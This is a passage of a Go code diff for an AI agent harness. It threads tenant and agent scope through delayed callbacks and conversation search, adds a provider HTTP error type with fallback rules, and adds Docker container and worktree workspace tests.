-	if callbacks[0].State != CallbackStateFired {
-		t.Errorf("expected fired during ongoing StartRun, got %s", callbacks[0].State)
+	// The callbacks map entry is still present with state "fired" (for state
+	// querying) until it is explicitly garbage-collected in a future pass.
+	mgr.mu.Lock()
+	cb := mgr.callbacks[info.ID]
+	mgr.mu.Unlock()
+	if cb == nil {
+		t.Fatal("callbacks map entry should still exist after fire")
+	}
+	if cb.info.State != CallbackStateFired {
+		t.Errorf("expected fired state in callbacks map, got %s", cb.info.State)
 	}
 
 	<-fireDone
@@ -1161,7 +1203,7 @@ func TestRegression_StateTransitions(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
 		mgr.mu.Unlock()
@@ -1181,7 +1223,7 @@ func TestRegression_StateTransitions(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		canceled, err := mgr.Cancel(info.ID)
 		if err != nil {
 			t.Fatalf("unexpected error: %v", err)
@@ -1196,7 +1238,7 @@ func TestRegression_StateTransitions(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
 		mgr.mu.Unlock()
@@ -1214,7 +1256,7 @@ func TestRegression_StateTransitions(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		mgr.Cancel(info.ID)
 
 		_, err := mgr.Cancel(info.ID)
@@ -1228,7 +1270,7 @@ func TestRegression_StateTransitions(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
 		mgr.mu.Unlock()
@@ -1247,7 +1289,7 @@ func TestRegression_StateTransitions(t *testing.T) {
 		mgr := NewCallbackManager(starter)
 		defer mgr.Shutdown()
 
-		info, _ := mgr.Set("conv-1", 30*time.Second, "check")
+		info, _ := mgr.Set(setReq("conv-1", 30*time.Second, "check"))
 		mgr.mu.Lock()
 		mgr.callbacks[info.ID].timer.Stop()
 		mgr.mu.Unlock()
@@ -1271,7 +1313,7 @@ func TestRegression_ShutdownDuringActiveFire(t *testing.T) {
 	startRunStarted := make(chan struct{})
 
 	starter := &mockRunStarter{
-		startFn: func(prompt, convID string) error {
+		startFn: func(prompt, convID, tenantID, agentID string) error {
 			close(startRunStarted) // signal that fire() is now inside StartRun
 			time.Sleep(500 * time.Millisecond)
 			return nil
@@ -1280,13 +1322,13 @@ func TestRegression_ShutdownDuringActiveFire(t *testing.T) {
 	mgr := NewCallbackManager(starter)
 
 	// Create one callback that will be fired (with slow StartRun)
-	firedInfo, err := mgr.Set("conv-1", 30*time.Second, "fired callback")
+	firedInfo, err := mgr.Set(setReq("conv-1", 30*time.Second, "fired callback"))
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
 
 	// Create another callback that should be canceled by shutdown
-	pendingInfo, err := mgr.Set("conv-1", 30*time.Second, "pending callback")
+	pendingInfo, err := mgr.Set(setReq("conv-1", 30*time.Second, "pending callback"))
 	if err != nil {
 		t.Fatalf("unexpected error: %v", err)
 	}
@@ -1336,7 +1378,7 @@ func TestRegression_ShutdownWithManyCallbacks(t *testing.T) {
 	for c := 0; c < convCount; c++ {
 		convID := fmt.Sprintf("conv-%d", c)
 		for i := 0; i < perConv; i++ {
-			_, err := mgr.Set(convID, 30*time.Second, fmt.Sprintf("check %d-%d", c, i))
+			_, err := mgr.Set(setReq(convID, 30*time.Second, fmt.Sprintf("check %d-%d", c, i)))
 			if err != nil {
 				t.Fatalf("unexpected error on conv-%d callback %d: %v", c, i, err)
 			}
@@ -1379,7 +1421,7 @@ func TestRegression_ResourceExhaustion(t *testing.T) {
 	for c := 0; c < convCount; c++ {
 		convID := fmt.Sprintf("conv-%d", c)
 		for i := 0; i < perConv; i++ {
-			_, err := mgr.Set(convID, 30*time.Second, fmt.Sprintf("check %d-%d", c, i))
+			_, err := mgr.Set(setReq(convID, 30*time.Second, fmt.Sprintf("check %d-%d", c, i)))
 			if err != nil {
 				t.Fatalf("unexpected error on conv-%d callback %d: %v", c, i, err)
 			}
@@ -1482,6 +1524,98 @@ func TestDelayedCallbackCatalogIntegration(t *testing.T) {
 			if tool.Definition.Name == "set_delayed_callback" {
 				t.Error("unexpected set_delayed_callback tool when manager is nil")
 			}
+		}
+	})
+}
+
+// --- T5: tenant + agent threaded through fire -> StartRun ---
+
+// testContextWithScope builds a tool context carrying the full run scope
+// (tenant + conversation + agent) so callbacks scheduled inside a tenant-scoped
+// conversation can be exercised end to end.
+func testContextWithScope(tenantID, convID, agentID string) context.Context {
+	return context.WithValue(context.Background(), ContextKeyRunMetadata, RunMetadata{
+		TenantID:       tenantID,
+		ConversationID: convID,
+		AgentID:        agentID,
+	})
+}
+
+// TestCallbackFireCarriesTenantAndAgent is the BUG B regression (T5): a callback
+// scheduled from a tenant+agent-scoped conversation MUST fire its follow-up run
+// on the SAME tenant and agent. Before the fix, fire() called StartRun with an
+// empty tenant+agent, so a tenant-scoped conversation got access-denied at fire
+// time — a direct autonomy breaker.
+func TestCallbackFireCarriesTenantAndAgent(t *testing.T) {
+	t.Run("fire via Set captures tenant+agent from run metadata", func(t *testing.T) {
+		starter := &mockRunStarter{}
+		mgr := NewCallbackManager(starter)
+		defer mgr.Shutdown()
+
+		// Schedule the callback through the real tool handler so it reads the
+		// tenant + agent from the originating run's metadata (the only place
+		// they are available at Set time).
+		tool := setDelayedCallbackTool(mgr)
+		ctx := testContextWithScope("tenant-x", "conv-1", "agent-y")
+		args, _ := json.Marshal(map[string]string{"delay": "5s", "prompt": "wake up"})
+		result, err := tool.Handler(ctx, args)
+		if err != nil {
+			t.Fatalf("unexpected error scheduling callback: %v", err)
+		}
+
+		var info CallbackInfo
+		if err := json.Unmarshal([]byte(result), &info); err != nil {
+			t.Fatalf("failed to unmarshal result: %v", err)
+		}
+
+		// Stop the real timer and fire directly.
+		mgr.mu.Lock()
+		mgr.callbacks[info.ID].timer.Stop()
+		mgr.mu.Unlock()
+		mgr.fire(info.ID)
+
+		calls := starter.getCalls()
+		if len(calls) != 1 {
+			t.Fatalf("expected 1 StartRun call, got %d", len(calls))
+		}
+		if calls[0].TenantID != "tenant-x" {
+			t.Errorf("StartRun tenant = %q, want tenant-x", calls[0].TenantID)
+		}
+		if calls[0].AgentID != "agent-y" {
+			t.Errorf("StartRun agent = %q, want agent-y", calls[0].AgentID)
+		}
+		if calls[0].ConversationID != "conv-1" {
+			t.Errorf("StartRun conv = %q, want conv-1", calls[0].ConversationID)
+		}
+		if calls[0].Prompt != "wake up" {
+			t.Errorf("StartRun prompt = %q, want 'wake up'", calls[0].Prompt)
+		}
+	})
+
+	t.Run("empty tenant+agent preserved for default case", func(t *testing.T) {
+		starter := &mockRunStarter{}
+		mgr := NewCallbackManager(starter)
+		defer mgr.Shutdown()
+
+		info, err := mgr.Set(setReq("conv-1", 5*time.Second, "check"))
+		if err != nil {
+			t.Fatalf("unexpected error: %v", err)
+		}
+
+		mgr.mu.Lock()
+		mgr.callbacks[info.ID].timer.Stop()
+		mgr.mu.Unlock()
+		mgr.fire(info.ID)
+
+		calls := starter.getCalls()
+		if len(calls) != 1 {
+			t.Fatalf("expected 1 StartRun call, got %d", len(calls))
+		}
+		if calls[0].TenantID != "" {
+			t.Errorf("StartRun tenant = %q, want empty", calls[0].TenantID)
+		}
+		if calls[0].AgentID != "" {
+			t.Errorf("StartRun agent = %q, want empty", calls[0].AgentID)
 		}
 	})
 }

--- a/internal/harness/tools_contract_test.go
+++ b/internal/harness/tools_contract_test.go
@@ -172,7 +172,7 @@ func (m *contractMockConversationStore) DeleteConversation(_ context.Context, _ 
 func (m *contractMockConversationStore) UpdateConversationMeta(_ context.Context, _, _, _ string) error {
 	return nil
 }
-func (m *contractMockConversationStore) SearchMessages(_ context.Context, _ string, _ int) ([]MessageSearchResult, error) {
+func (m *contractMockConversationStore) SearchMessages(_ context.Context, _ string, _ string, _ int) ([]MessageSearchResult, error) {
 	return []MessageSearchResult{}, nil
 }
 func (m *contractMockConversationStore) DeleteOldConversations(_ context.Context, _ time.Time) (int, error) {

--- a/internal/harness/tools_default.go
+++ b/internal/harness/tools_default.go
@@ -77,7 +77,21 @@ func (a *conversationStoreAdapter) ListConversations(ctx context.Context, limit,
 }
 
 func (a *conversationStoreAdapter) SearchConversations(ctx context.Context, query string, limit int) ([]htools.ConversationSearchResult, error) {
-	msgs, err := a.store.SearchMessages(ctx, query, limit)
+	// Thread the run's tenant into the search so an agent cannot full-text-search
+	// conversations owned by other tenants via this LLM-exposed tool.
+	// RunMetadata is injected into the tool context by the step engine before any
+	// tool handler is invoked (runner_step_engine.go, ContextKeyRunMetadata).
+	//
+	// Tenant rules:
+	//   • Non-empty TenantID (including "default") → scope search to that tenant.
+	//   • No RunMetadata in context (auth-disabled local callers) → empty tenantID
+	//     disables the filter, preserving the pre-fix behaviour for single-process
+	//     deployments that have no tenant isolation requirement.
+	tenantID := ""
+	if meta, ok := htools.RunMetadataFromContext(ctx); ok {
+		tenantID = meta.TenantID
+	}
+	msgs, err := a.store.SearchMessages(ctx, tenantID, query, limit)
 	if err != nil {
 		return nil, err
 	}

--- a/internal/harness/tools_default_search_tenant_test.go
+++ b/internal/harness/tools_default_search_tenant_test.go
@@ -1,0 +1,133 @@
+package harness
+
+import (
+	"context"
+	"testing"
+	"time"
+
+	htools "go-agent-harness/internal/harness/tools"
+)
+
+// spyConversationStore implements ConversationStore and records the tenantID
+// passed to SearchMessages so tests can assert that the adapter threads the
+// run's tenant into the search call.
+type spyConversationStore struct {
+	capturedTenantID string
+	results          []MessageSearchResult
+	searchErr        error
+}
+
+func (s *spyConversationStore) Migrate(_ context.Context) error { return nil }
+func (s *spyConversationStore) Close() error                    { return nil }
+func (s *spyConversationStore) SaveConversation(_ context.Context, _ string, _ []Message) error {
+	return nil
+}
+func (s *spyConversationStore) SaveConversationWithCost(_ context.Context, _ string, _ []Message, _ ConversationTokenCost) error {
+	return nil
+}
+func (s *spyConversationStore) LoadMessages(_ context.Context, _ string) ([]Message, error) {
+	return nil, nil
+}
+func (s *spyConversationStore) ListConversations(_ context.Context, _ ConversationFilter, _, _ int) ([]Conversation, error) {
+	return nil, nil
+}
+func (s *spyConversationStore) DeleteConversation(_ context.Context, _ string) error { return nil }
+func (s *spyConversationStore) UpdateConversationMeta(_ context.Context, _, _, _ string) error {
+	return nil
+}
+func (s *spyConversationStore) GetConversationOwner(_ context.Context, _ string) (*Conversation, error) {
+	return nil, nil
+}
+func (s *spyConversationStore) SearchMessages(_ context.Context, tenantID, _ string, _ int) ([]MessageSearchResult, error) {
+	s.capturedTenantID = tenantID
+	return s.results, s.searchErr
+}
+func (s *spyConversationStore) DeleteOldConversations(_ context.Context, _ time.Time) (int, error) {
+	return 0, nil
+}
+func (s *spyConversationStore) PinConversation(_ context.Context, _ string, _ bool) error {
+	return nil
+}
+func (s *spyConversationStore) CompactConversation(_ context.Context, _ string, _ int, _ Message) error {
+	return nil
+}
+
+// TestConversationStoreAdapter_SearchScoped verifies that SearchConversations
+// threads the run's TenantID (from context RunMetadata) into SearchMessages,
+// so agents cannot search across tenant boundaries via the in-agent tool.
+// This is the TDD test for the PFIX-6 cross-tenant search fix.
+func TestConversationStoreAdapter_SearchScoped(t *testing.T) {
+	t.Parallel()
+
+	spy := &spyConversationStore{
+		results: []MessageSearchResult{
+			{ConversationID: "conv-1", Role: "user", Snippet: "hello world"},
+		},
+	}
+	adapter := &conversationStoreAdapter{store: spy}
+
+	// Context carries RunMetadata for tenant "tenantA".
+	ctx := context.WithValue(
+		context.Background(),
+		htools.ContextKeyRunMetadata,
+		htools.RunMetadata{RunID: "run-1", TenantID: "tenantA"},
+	)
+
+	results, err := adapter.SearchConversations(ctx, "hello", 10)
+	if err != nil {
+		t.Fatalf("SearchConversations: %v", err)
+	}
+	if len(results) != 1 {
+		t.Fatalf("expected 1 result, got %d", len(results))
+	}
+
+	// The tenant passed to SearchMessages MUST equal the run's TenantID.
+	if spy.capturedTenantID != "tenantA" {
+		t.Errorf("SearchMessages called with tenantID=%q; want %q (cross-tenant search leak)", spy.capturedTenantID, "tenantA")
+	}
+}
+
+// TestConversationStoreAdapter_SearchDefaultTenantPassthrough verifies that
+// the "default" synthetic tenant is passed through to SearchMessages (non-empty),
+// so the filter remains active for single-tenant deployments that use the
+// runner's canonical "default" tenant normalisation.
+func TestConversationStoreAdapter_SearchDefaultTenantPassthrough(t *testing.T) {
+	t.Parallel()
+
+	spy := &spyConversationStore{}
+	adapter := &conversationStoreAdapter{store: spy}
+
+	ctx := context.WithValue(
+		context.Background(),
+		htools.ContextKeyRunMetadata,
+		htools.RunMetadata{RunID: "run-2", TenantID: "default"},
+	)
+
+	_, _ = adapter.SearchConversations(ctx, "query", 5)
+
+	// "default" is the runner's canonical form for the unnamed tenant.
+	// Passing it to SearchMessages as non-empty keeps the filter active
+	// and scopes results to conversations whose tenant_id = "default".
+	// An empty tenantID would disable the filter entirely.
+	if spy.capturedTenantID == "" {
+		t.Errorf("SearchMessages called with empty tenantID for 'default' tenant; filter must remain active")
+	}
+}
+
+// TestConversationStoreAdapter_SearchNoMetadataNoFilter verifies that when
+// no RunMetadata is present in the context (e.g. auth-disabled local callers),
+// SearchMessages is called with an empty tenantID (no filter), preserving the
+// pre-fix behaviour for auth-disabled deployments.
+func TestConversationStoreAdapter_SearchNoMetadataNoFilter(t *testing.T) {
+	t.Parallel()
+
+	spy := &spyConversationStore{}
+	adapter := &conversationStoreAdapter{store: spy}
+
+	// Plain background context — no RunMetadata.
+	_, _ = adapter.SearchConversations(context.Background(), "query", 5)
+
+	if spy.capturedTenantID != "" {
+		t.Errorf("SearchMessages called with tenantID=%q for auth-disabled context; want empty (no filter)", spy.capturedTenantID)
+	}
+}

--- a/internal/harness/tools_default_test.go
+++ b/internal/harness/tools_default_test.go
@@ -156,9 +156,9 @@ func TestDefaultRegistry_RecipesDir_Empty_NoRegistry(t *testing.T) {
 
 // mockConvStore is a minimal ConversationStore for adapter tests.
 type mockConvStore struct {
-	convs  []Conversation
-	msgs   []MessageSearchResult
-	err    error
+	convs []Conversation
+	msgs  []MessageSearchResult
+	err   error
 }
 
 func (m *mockConvStore) Migrate(_ context.Context) error { return nil }
@@ -179,7 +179,7 @@ func (m *mockConvStore) DeleteConversation(_ context.Context, _ string) error { 
 func (m *mockConvStore) UpdateConversationMeta(_ context.Context, _, _, _ string) error {
 	return nil
 }
-func (m *mockConvStore) SearchMessages(_ context.Context, _ string, _ int) ([]MessageSearchResult, error) {
+func (m *mockConvStore) SearchMessages(_ context.Context, _ string, _ string, _ int) ([]MessageSearchResult, error) {
 	return m.msgs, m.err
 }
 func (m *mockConvStore) DeleteOldConversations(_ context.Context, _ time.Time) (int, error) {

--- a/internal/harness/types.go
+++ b/internal/harness/types.go
@@ -3,6 +3,7 @@ package harness
 import (
 	"context"
 	"encoding/json"
+	"errors"
 	"fmt"
 	"time"
 
@@ -208,6 +209,51 @@ type ToolCallSummary struct {
 	Step     int    `json:"step"`
 }
 
+// ProviderHTTPError is returned by provider clients when the upstream API
+// responds with a non-2xx HTTP status code. Its Error() string is
+// byte-identical to the fmt.Errorf messages the OpenAI and Anthropic clients
+// previously produced, so any existing string-based assertions continue to
+// pass. The structured fields allow the fallback machinery to inspect the
+// status code without string parsing.
+//
+// Example errors:
+//
+//	"openai request failed (429): <body>"
+//	"anthropic request failed (503): <body>"
+type ProviderHTTPError struct {
+	// Provider is the lowercase provider name (e.g. "openai", "anthropic").
+	Provider string
+	// StatusCode is the HTTP status code returned by the upstream API.
+	StatusCode int
+	// Body is the trimmed response body text returned by the upstream API.
+	Body string
+}
+
+// Error returns the provider error string in the canonical format:
+// "<provider> request failed (<status>): <body>"
+// This matches the exact text previously produced by fmt.Errorf in each
+// provider client, ensuring backward compatibility with string assertions.
+func (e *ProviderHTTPError) Error() string {
+	return fmt.Sprintf("%s request failed (%d): %s", e.Provider, e.StatusCode, e.Body)
+}
+
+// isFallbackEligible reports whether err is a *ProviderHTTPError with a status
+// code that warrants trying a fallback provider.  Eligible codes are transient
+// server-side failures: 429, 500, 502, 503, 504.  Client-side errors (400,
+// 401, 403, 404, 422) are NOT eligible because retrying with a different
+// provider will not fix a malformed or unauthorised request.
+func isFallbackEligible(err error) bool {
+	var phe *ProviderHTTPError
+	if !errors.As(err, &phe) {
+		return false
+	}
+	switch phe.StatusCode {
+	case 429, 500, 502, 503, 504:
+		return true
+	}
+	return false
+}
+
 type Provider interface {
 	Complete(ctx context.Context, req CompletionRequest) (CompletionResult, error)
 }
@@ -263,6 +309,10 @@ type WorkspaceProvisionOptions struct {
 	WorktreeRootDir string
 	// BaseDir is the base directory for local workspace subdirectories.
 	BaseDir string
+	// ConfigTOML is an optional serialized TOML configuration string written to
+	// harness.toml in the workspace root after provisioning. When non-empty it is
+	// forwarded to workspace.Options.ConfigTOML. Never include secrets here.
+	ConfigTOML string
 }
 
 type RunRequest struct {
@@ -287,16 +337,28 @@ type RunRequest struct {
 	// ProviderName explicitly selects which catalog provider to use for this run.
 	// When set, overrides the automatic provider resolution from the model name.
 	// Must match a provider key in the model catalog (e.g. "openai", "anthropic").
-	ProviderName     string            `json:"provider_name,omitempty"`
-	AllowFallback    bool              `json:"allow_fallback,omitempty"`
-	SystemPrompt     string            `json:"system_prompt,omitempty"`
-	TenantID         string            `json:"tenant_id,omitempty"`
-	ConversationID   string            `json:"conversation_id,omitempty"`
-	AgentID          string            `json:"agent_id,omitempty"`
-	AgentIntent      string            `json:"agent_intent,omitempty"`
-	TaskContext      string            `json:"task_context,omitempty"`
-	PromptProfile    string            `json:"prompt_profile,omitempty"`
-	PromptExtensions *PromptExtensions `json:"prompt_extensions,omitempty"`
+	ProviderName  string `json:"provider_name,omitempty"`
+	AllowFallback bool   `json:"allow_fallback,omitempty"`
+	// FallbackProviders is an ordered list of provider names to try when
+	// allow_fallback is true and the primary provider returns a
+	// fallback-eligible runtime error (e.g. HTTP 429, 500, 502, 503, 504).
+	// Providers are attempted in order; the first successful response wins.
+	// When empty and allow_fallback is true, the runner falls back to the
+	// runner-level default provider (if different from the primary).
+	//
+	// Model constraint: the same CompletionRequest.Model (i.e. the primary
+	// model name) is sent verbatim to every fallback provider.  Fallback
+	// providers must therefore serve that exact model ID.  No model
+	// translation or remapping is performed between candidates.
+	FallbackProviders []string          `json:"fallback_providers,omitempty"`
+	SystemPrompt      string            `json:"system_prompt,omitempty"`
+	TenantID          string            `json:"tenant_id,omitempty"`
+	ConversationID    string            `json:"conversation_id,omitempty"`
+	AgentID           string            `json:"agent_id,omitempty"`
+	AgentIntent       string            `json:"agent_intent,omitempty"`
+	TaskContext       string            `json:"task_context,omitempty"`
+	PromptProfile     string            `json:"prompt_profile,omitempty"`
+	PromptExtensions  *PromptExtensions `json:"prompt_extensions,omitempty"`
 	// MaxSteps caps the number of LLM turns for this run.
 	// 0 means use the runner's config default (which may itself be 0 = unlimited).
 	// Negative values are rejected at StartRun time.

--- a/internal/harness/workspace_container_docker_test.go
+++ b/internal/harness/workspace_container_docker_test.go
@@ -1,0 +1,267 @@
+package harness
+
+// T-C-container-runner-e2e: prove an end-to-end run with WorkspaceType:"container"
+// provisions a Docker container workspace and destroys it on completion.
+//
+// Gates:
+//  1. requireContainerHarnessDocker (memoized) — skips if Docker is absent.
+//  2. requireContainerHarnessImage   — skips if go-agent-harness:latest is absent.
+//
+// The helper names are file-unique (not "requireDocker") to avoid conflicts with
+// other files in the package or binary that may define their own requireDocker.
+//
+// Run locally (no build tag needed — the gate is runtime):
+//
+//	go test ./internal/harness/... -run TestContainerRunner_E2E -v -count=1 -race
+
+import (
+	"context"
+	"fmt"
+	"os/exec"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+// ---------------------------------------------------------------------------
+// Memoized Docker availability guards
+// ---------------------------------------------------------------------------
+
+var (
+	containerHarnessDockerOnce       sync.Once
+	containerHarnessDockerSkipReason string
+)
+
+// requireContainerHarnessDocker skips t if Docker is not reachable.
+// The probe (LookPath + "docker info") runs at most once per test binary.
+func requireContainerHarnessDocker(t *testing.T) {
+	t.Helper()
+	containerHarnessDockerOnce.Do(func() {
+		if _, err := exec.LookPath("docker"); err != nil {
+			containerHarnessDockerSkipReason = "docker CLI not found in PATH"
+			return
+		}
+		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+		defer cancel()
+		out, err := exec.CommandContext(ctx, "docker", "info").CombinedOutput()
+		if err != nil {
+			containerHarnessDockerSkipReason = fmt.Sprintf(
+				"docker daemon unavailable: %v: %s", err, strings.TrimSpace(string(out)))
+		}
+	})
+	if containerHarnessDockerSkipReason != "" {
+		t.Skipf("skipping container-runner e2e: %s", containerHarnessDockerSkipReason)
+	}
+}
+
+// requireContainerHarnessImage skips t when the named image is absent locally.
+// provisionRunWorkspace hard-codes "go-agent-harness:latest" and cannot accept
+// an injected image name, so this guard is the correct way to avoid a fail-not-skip
+// when the image is missing in CI.
+func requireContainerHarnessImage(t *testing.T, image string) {
+	t.Helper()
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+	out, err := exec.CommandContext(ctx, "docker", "image", "inspect",
+		"--format", "{{.Id}}", image).CombinedOutput()
+	if err != nil || strings.TrimSpace(string(out)) == "" {
+		t.Skipf("skipping: image %q not present locally (%v) — build it first with 'make docker-build'",
+			image, err)
+	}
+}
+
+// ---------------------------------------------------------------------------
+// E2E test
+// ---------------------------------------------------------------------------
+
+// TestContainerRunner_E2E (T-C-container-runner-e2e, Deliverable C) proves that
+// a run with WorkspaceType:"container" provisions a Docker container workspace,
+// emits workspace.provisioned with a non-empty workspace_path / container id,
+// completes the run, and emits workspace.destroyed — confirming the container
+// was cleaned up.
+//
+// The run uses a terminal-turn stubProvider so no real LLM call is needed.
+func TestContainerRunner_E2E(t *testing.T) {
+	// Gate 1: Docker daemon must be reachable.
+	requireContainerHarnessDocker(t)
+	// Gate 2: The harness image must exist locally — otherwise skip, not fail.
+	// The constant "go-agent-harness:latest" mirrors workspace.defaultImage and is
+	// what provisionRunWorkspace passes to workspace.New for "container" type.
+	const harnessImage = "go-agent-harness:latest"
+	requireContainerHarnessImage(t, harnessImage)
+
+	// A single-turn provider that returns immediately, terminating the run.
+	provider := &staticProviderWS{result: CompletionResult{Content: "container e2e done"}}
+
+	runner := NewRunner(
+		provider,
+		NewRegistry(),
+		RunnerConfig{
+			MaxSteps:     1,
+			DefaultModel: "test-model",
+			// WorkspaceBaseOptions.BaseDir is empty; provisionRunWorkspace passes
+			// it through to workspace.Options.BaseDir which defaults to os.TempDir()
+			// inside ContainerWorkspace.Provision.
+		},
+	)
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "container e2e",
+		WorkspaceType: "container",
+	})
+	if err != nil {
+		t.Fatalf("StartRun with workspace_type=container failed: %v", err)
+	}
+	if run.ID == "" {
+		t.Fatal("expected non-empty run ID")
+	}
+
+	// Collect all events until a terminal event or 2-minute timeout.
+	// Container provisioning (pulling the already-present image, starting the
+	// container, polling for running state) can take up to ~30 s in the slow path.
+	events := drainRunEventsWSWithTimeout(t, runner, run.ID, 2*time.Minute)
+
+	// Locate workspace events.
+	var (
+		provisionedEv *Event
+		destroyedEv   *Event
+		failedEv      *Event
+	)
+	for i := range events {
+		switch events[i].Type {
+		case EventWorkspaceProvisioned:
+			provisionedEv = &events[i]
+		case EventWorkspaceDestroyed:
+			destroyedEv = &events[i]
+		case EventRunFailed:
+			failedEv = &events[i]
+		}
+	}
+
+	// If provisioning failed (not a skip-worthy error but a real one), report it
+	// with context so CI has actionable output.
+	if provisionedEv == nil {
+		// Look for workspace.provision_failed to extract the error message.
+		for i := range events {
+			if events[i].Type == EventWorkspaceProvisionFailed {
+				errMsg, _ := events[i].Payload["error"].(string)
+				t.Fatalf("workspace.provisioned never emitted; provision failed with: %s", errMsg)
+			}
+		}
+		t.Fatalf("workspace.provisioned never emitted; events: %v", eventTypesForContainerTest(events))
+	}
+
+	// Assert provisioned payload carries workspace_type and workspace_path.
+	if got, _ := provisionedEv.Payload["workspace_type"].(string); got != "container" {
+		t.Errorf("workspace.provisioned workspace_type = %q, want %q", got, "container")
+	}
+	wsPath, _ := provisionedEv.Payload["workspace_path"].(string)
+	if wsPath == "" {
+		t.Error("workspace.provisioned payload missing non-empty workspace_path")
+	}
+
+	// The run must complete (not fail) — a 1-step terminal provider should succeed.
+	if failedEv != nil {
+		errMsg, _ := failedEv.Payload["error"].(string)
+		t.Fatalf("run failed unexpectedly: %s", errMsg)
+	}
+	hasCompleted := false
+	for _, ev := range events {
+		if ev.Type == EventRunCompleted {
+			hasCompleted = true
+			break
+		}
+	}
+	if !hasCompleted {
+		t.Errorf("run.completed not emitted; events: %v", eventTypesForContainerTest(events))
+	}
+
+	// workspace.destroyed must be emitted — confirms the container was cleaned up.
+	if destroyedEv == nil {
+		t.Fatalf("workspace.destroyed never emitted; events: %v", eventTypesForContainerTest(events))
+	}
+	if got, _ := destroyedEv.Payload["workspace_type"].(string); got != "container" {
+		t.Errorf("workspace.destroyed workspace_type = %q, want %q", got, "container")
+	}
+	// If destroy produced an error, surface it (test still passes since
+	// workspace.destroyed was emitted, but the error is useful for diagnostics).
+	if errVal, _ := destroyedEv.Payload["error"].(string); errVal != "" {
+		t.Logf("workspace.destroyed carried a non-fatal error: %s", errVal)
+	}
+
+	// Event ordering: provisioned < destroyed < completed.
+	provIdx := -1
+	destIdx := -1
+	complIdx := -1
+	for i, ev := range events {
+		switch ev.Type {
+		case EventWorkspaceProvisioned:
+			if provIdx < 0 {
+				provIdx = i
+			}
+		case EventWorkspaceDestroyed:
+			if destIdx < 0 {
+				destIdx = i
+			}
+		case EventRunCompleted:
+			if complIdx < 0 {
+				complIdx = i
+			}
+		}
+	}
+	if provIdx >= 0 && destIdx >= 0 && provIdx >= destIdx {
+		t.Errorf("workspace.provisioned (%d) must precede workspace.destroyed (%d)", provIdx, destIdx)
+	}
+	if destIdx >= 0 && complIdx >= 0 && destIdx >= complIdx {
+		t.Errorf("workspace.destroyed (%d) must precede run.completed (%d)", destIdx, complIdx)
+	}
+}
+
+// drainRunEventsWSWithTimeout is drainRunEventsWS with a caller-controlled deadline.
+// It exists so the container E2E test can afford a longer timeout than the
+// default 10 s used by drainRunEventsWS.
+func drainRunEventsWSWithTimeout(t *testing.T, runner *Runner, runID string, timeout time.Duration) []Event {
+	t.Helper()
+
+	history, stream, cancel, err := runner.Subscribe(runID)
+	if err != nil {
+		t.Fatalf("Subscribe(%q): %v", runID, err)
+	}
+	defer cancel()
+
+	var events []Event
+	events = append(events, history...)
+
+	for _, ev := range history {
+		if IsTerminalEvent(ev.Type) {
+			return events
+		}
+	}
+
+	deadline := time.After(timeout)
+	for {
+		select {
+		case ev, ok := <-stream:
+			if !ok {
+				return events
+			}
+			events = append(events, ev)
+			if IsTerminalEvent(ev.Type) {
+				return events
+			}
+		case <-deadline:
+			t.Logf("drainRunEventsWSWithTimeout: timed out after %v; collected %d events", timeout, len(events))
+			return events
+		}
+	}
+}
+
+// eventTypesForContainerTest returns event types as strings for diagnostic output.
+func eventTypesForContainerTest(events []Event) []string {
+	types := make([]string, len(events))
+	for i, ev := range events {
+		types[i] = string(ev.Type)
+	}
+	return types
+}

--- a/internal/harness/workspace_selection_test.go
+++ b/internal/harness/workspace_selection_test.go
@@ -8,6 +8,7 @@ import (
 	"os/exec"
 	"path/filepath"
 	"strings"
+	"sync"
 	"testing"
 	"time"
 
@@ -725,5 +726,670 @@ allow = []
 				t.Errorf("workspace.provisioned type = worktree, want local — explicit WorkspaceType should win")
 			}
 		}
+	}
+}
+
+// T-PFIX-1: when workspace provisioning fails AFTER git worktree add (partial
+// success), the runner must Destroy the partial workspace before emitting
+// workspace.provision_failed so no orphaned worktree dir or git branch remains.
+//
+// Failure is induced by making the newly-created worktree directory read-only
+// after git worktree add creates it but before the harness.toml ConfigTOML write
+// runs. A background goroutine watches for the worktree subdirectory to appear
+// and immediately removes write permission (0o555). This causes os.WriteFile to
+// return "permission denied", triggering the partial-failure path.
+func TestWorktreePartialProvisionFailure_NoOrphan(t *testing.T) {
+	t.Parallel()
+
+	repoDir := initGitRepoForWS(t)
+	worktreeRootDir := t.TempDir()
+
+	// background goroutine: watch for the worktree to be fully provisioned by
+	// git (i.e. the .git file is present inside the worktree dir), then make the
+	// directory read-only so the subsequent harness.toml ConfigTOML write fails.
+	// Waiting for .git ensures git worktree add has completed, so the partial
+	// failure happens at the ConfigTOML write step — not inside git itself.
+	var (
+		mu          sync.Mutex
+		chmodTarget string
+	)
+	watchDone := make(chan struct{})
+	go func() {
+		defer close(watchDone)
+		deadline := time.Now().Add(15 * time.Second)
+		for time.Now().Before(deadline) {
+			entries, err := os.ReadDir(worktreeRootDir)
+			if err == nil && len(entries) > 0 {
+				for _, e := range entries {
+					if !e.IsDir() {
